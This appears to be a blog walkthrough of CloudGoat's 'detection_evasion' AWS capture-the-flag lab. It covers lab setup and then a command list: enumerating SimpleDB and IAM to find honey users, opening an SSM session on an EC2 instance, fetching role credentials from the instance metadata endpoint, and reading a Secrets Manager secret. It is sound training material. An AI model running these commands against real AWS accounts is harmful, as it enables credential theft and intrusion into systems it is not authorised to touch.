Cloudgoat AWS CTF solution- Scenerio 11 (detection_evasion)

Scenerio 11- detection_evasion

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py config whitelist --auto
./cloudgoat.py create detection_evasion

Scenario Resources (High Level)

Scenario Start(s)

Scenario Goal(s)

Summary (TLDR setup below)

TLDR Setup

  1. Set up a temporary email address if desired.
  2. Deploy the cloudgoat scenario. You will need to enter your email when prompted, and it will subsequently be stored in the ‘config.yml’ file at the top level of the repo.
  3. Check your email address for SNS confirmation emails; there should be two. Confirm that you want to subscribe to the topics.
  4. Wait 30–60 minutes before working on the scenario. This is necessary because there is some lag between the time that terraform finishes deploying all resources and the time that your CLI actions will actually trigger the alerts that result in email notifications.

SPOILER ALERT: There are spoilers for the scenario below this point.

Exploitation Route

Walkthrough Overview — Easy Path

  1. Discovering honey users-
aws --profile user_1 sdb list-domains --region us-east-1
aws --profile user_2 sdb list-domains --region us-east-1
aws --profile user_3 sdb list-domains --region us-east-1
aws --profile cg4 --region us-east-1 sdb list-domains
aws --profile user_4 iam list-groups-for-user --user-name r_waterhouse
aws --profile user_4 iam list-group-policies --group-name cg-developers
aws --profile user_4 iam get-group-policy --group-name cg-developers --policy-name developer_policy
aws --profile user_4 --region us-east-1 ec2 describe-instances
aws --profile user_4 --region us-east-1  ssm start-session --target "i-0b90cd487675a2818"
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/detection_evasion_cgid2wolmzzgua_easy
enumerate-iam
aws --region us-east-1  secretsmanager list-secrets --profile ec2_role
aws --profile ec2_role --region us-east-1  secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_easy_secret-0D0aJ8"

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store